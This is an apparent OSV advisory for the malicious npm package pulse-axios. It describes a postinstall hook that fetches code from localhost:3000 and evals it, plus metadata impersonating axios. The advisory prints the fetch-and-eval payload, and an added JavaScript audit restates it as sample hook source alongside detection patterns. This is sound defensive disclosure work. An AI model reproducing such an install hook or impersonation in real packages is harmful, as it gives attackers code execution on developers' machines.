MAL-2026-4651

Import Source
https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/pulse-axios/MAL-2026-4651.json
JSON Data
https://api.osv.dev/v1/vulns/MAL-2026-4651
Published
2026-05-20T01:56:30Z
Modified
2026-05-26T06:02:52.481799152Z
Summary
Malicious code in pulse-axios (npm)
Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (c64dad53e23f7fcba3813e9ae6caee3f9461f5e52194165da668e5332e78bb99)

pulse-axios@1.16.1 declares a postinstall hook (`node ./lib/core/eval.js`) that on `npm install` issues `fetch('http://localhost:3000/download/data')`, reads the response body as text, and passes it to `eval` inside an async IIFE: `` await eval(`(async () => {\n${datab2}\n})();`) ``. Errors are silently swallowed in an empty catch. Any bytes returned by whatever process is listening on port 3000 at install time — including any local attacker process, a co-installed malicious package's helper, or a developer-staging payload server — execute with the installer's privileges. The package additionally impersonates the legitimate `axios` package: `name` is `pulse-axios`, the description claims to be "a faster and better version of axios", `author` is set to `Matt Zabriskie` (the real axios maintainer), `repository.url` points to `https://github.com/axios/axios.git`, and `homepage` is `https://axios-http.com`. The copied metadata is designed to fool installers into believing this is a legitimate axios variant. Combined, the package is a typosquat lure that ships an install-time RCE primitive.
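The two signals described above, an install-lifecycle script and manifest metadata copied from another project, are both checkable before `npm install` runs anything. The following is an added example, not code from the OSV record or the ossf/malicious-packages project: a Node.js pre-install audit that reads a package manifest and the source of any hook script it names, and flags the combination. The sample manifest and hook-script text are constructed here from the fields the advisory lists (they are not the real package contents), and the pattern list and function names are this example's own assumptions.

```javascript
// Added example (not from the advisory or ossf/malicious-packages): audit an
// extracted npm tarball for install-time hooks plus impersonation metadata.
// Typical use: `npm pack <pkg>@<version>`, untar, then run this on package.json
// and the script each hook command points at, before any `npm install`.

const INSTALL_HOOKS = ['preinstall', 'install', 'postinstall', 'prepare'];

// Source patterns worth flagging in a script that an install hook executes
// (assumed list for this example; extend it for your environment).
const RISKY_SOURCE_PATTERNS = [
  { id: 'dynamic-eval', re: /\beval\s*\(|new\s+Function\s*\(/ },
  { id: 'network-fetch', re: /\bfetch\s*\(|require\(['"](node:)?https?['"]\)/ },
  { id: 'localhost-url', re: /https?:\/\/(localhost|127\.0\.0\.1)(:\d+)?/ },
  { id: 'child-process', re: /require\(['"](node:)?child_process['"]\)/ },
];

// Project name a repository URL points at, e.g.
// https://github.com/axios/axios.git -> "axios".
function repoNameFromUrl(url) {
  if (typeof url !== 'string') return null;
  const m = url.match(/\/([^/]+?)(?:\.git)?\/?$/);
  return m ? m[1].toLowerCase() : null;
}

// Manifest-level findings: lifecycle hooks, and a repository that belongs to
// a differently named project (the advisory's axios impersonation signal).
function auditManifest(manifest) {
  const findings = [];
  const scripts = manifest.scripts || {};
  for (const hook of INSTALL_HOOKS) {
    if (scripts[hook]) {
      findings.push({ kind: 'install-hook', hook, command: scripts[hook] });
    }
  }
  const repoName = repoNameFromUrl(manifest.repository && manifest.repository.url);
  if (repoName && manifest.name && repoName !== manifest.name.toLowerCase()) {
    findings.push({ kind: 'repo-name-mismatch', name: manifest.name, repository: repoName });
  }
  if (manifest.description && /\b(faster|better)\b.*\bversion of\b/i.test(manifest.description)) {
    findings.push({ kind: 'impersonation-wording', description: manifest.description });
  }
  return findings;
}

// Source-level findings: ids of the risky patterns present in a hook script.
function auditScriptSource(source) {
  return RISKY_SOURCE_PATTERNS.filter((p) => p.re.test(source)).map((p) => p.id);
}

// Block when an install hook exists AND its script shows risky behaviour;
// metadata mismatches alone are reported but do not block on their own.
function summarize(manifest, hookSource) {
  const manifestFindings = auditManifest(manifest);
  const sourceFindings = hookSource ? auditScriptSource(hookSource) : [];
  const hasHook = manifestFindings.some((f) => f.kind === 'install-hook');
  return { block: hasHook && sourceFindings.length > 0, manifestFindings, sourceFindings };
}

// Constructed sample mirroring the package.json fields the advisory lists.
const SAMPLE_MANIFEST = {
  name: 'pulse-axios',
  version: '1.16.1',
  description: 'A faster and better version of axios',
  author: 'Matt Zabriskie',
  repository: { type: 'git', url: 'https://github.com/axios/axios.git' },
  homepage: 'https://axios-http.com',
  scripts: { postinstall: 'node ./lib/core/eval.js' },
};

// Constructed stand-in for the hook script text, carrying only the indicators
// the advisory describes (a localhost fetch whose body is passed to eval).
const SAMPLE_HOOK_SOURCE =
  "const r = await fetch('http://localhost:3000/download/data');\n" +
  'await eval(await r.text());';

const REPORT = summarize(SAMPLE_MANIFEST, SAMPLE_HOOK_SOURCE);
console.log(JSON.stringify(REPORT, null, 2));
```

On the constructed sample the report blocks: one `install-hook` finding for `postinstall`, a `repo-name-mismatch` between `pulse-axios` and `axios`, and source findings `dynamic-eval`, `network-fetch` and `localhost-url`. Running the same audit on a genuine `axios` manifest with no lifecycle scripts yields no findings, which is the point of gating on the hook-plus-risky-source combination rather than on any single field.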

Database specific
{
    "malicious-packages-origins": [
        {
            "modified_time": "2026-05-21T06:54:36Z",
            "versions": [
                "1.17.2"
            ],
            "sha256": "28257d4309df99e3d275ee13a8070e9be516444fc5a5e954c864cbf7d7b1f89c",
            "id": "IN-MAL-2026-003766",
            "source": "amazon-inspector",
            "import_time": "2026-05-26T05:51:16.460920647Z"
        },
        {
            "modified_time": "2026-05-20T02:00:14Z",
            "versions": [
                "1.17.1"
            ],
            "sha256": "5697e55222985697b89b9d1755984516563ff0a30218ac331c34aee46f3f1d07",
            "id": "IN-MAL-2026-003389",
            "source": "amazon-inspector",
            "import_time": "2026-05-26T05:50:32.977313736Z"
        },
        {
            "modified_time": "2026-05-21T06:54:36Z",
            "versions": [
                "1.17.2"
            ],
            "sha256": "a04cbfa8262f2b1fc518a4124a825108b1895b24e6222a1306c57c136aa180a7",
            "id": "IN-MAL-2026-003767",
            "source": "amazon-inspector",
            "import_time": "2026-05-26T05:51:16.556905649Z"
        },
        {
            "modified_time": "2026-05-20T01:56:30Z",
            "versions": [
                "1.16.1"
            ],
            "sha256": "c64dad53e23f7fcba3813e9ae6caee3f9461f5e52194165da668e5332e78bb99",
            "id": "IN-MAL-2026-003385",
            "source": "amazon-inspector",
            "import_time": "2026-05-26T05:50:32.522011889Z"
        },
        {
            "modified_time": "2026-05-20T02:00:14Z",
            "versions": [
                "1.17.1"
            ],
            "sha256": "d53e7eba89c2c1763024ac4b829f4f12f5e5f901a407c4fc7b157417aec557f1",
            "id": "IN-MAL-2026-003390",
            "source": "amazon-inspector",
            "import_time": "2026-05-26T05:50:33.070727028Z"
        }
    ]
}
References
Credits

Affected packages

npm / pulse-axios

Package

Affected ranges

Affected versions

1.*
1.16.1
1.17.1
1.17.2

Database specific

indicators
{
    "domains": [
        "consequences-faces-weblogs-clinical.trycloudflare.com"
    ],
    "evidence_files": [
        {
            "sha256": "ec84bb94f37b0021bcea38c9b1e5c326dda236d4e9c83bfc11093e597d23a9fe",
            "tlsh": "21e026aa303f26754f7123f89d57180ff722b31b76c4c1c5f39486048e326a14945e5d",
            "path": "lib/core/eval.js"
        },
        {
            "sha256": "19649e1b8bf32423969ba39b72913c934844eb6a991ddc1a0493a3a243706dc9",
            "tlsh": "b2d1ec73c9ca4d572fb47aa8a87a9264f231c30fa551c90fb07e024c4f7572f129762a",
            "path": "package.json"
        }
    ],
    "package_integrity": [
        {
            "hashes": {
                "sha512_sri": "sha512-V65XeJl04Q9VAFB6bsNTktIN64Qiw/qc9LLj4m6UFRRUSzI+5eUP3s23lP8fXnwa8a2tsMToPZGCdq/sApsSig==",
                "sha1": "f81c5e006cfe568db6d2524dca71a86c859d392b"
            },
            "filename": "pulse-axios-1.17.2.tgz"
        }
    ]
}
cwes
[
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    },
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    },
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    }
]
source
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/pulse-axios/MAL-2026-4651.json"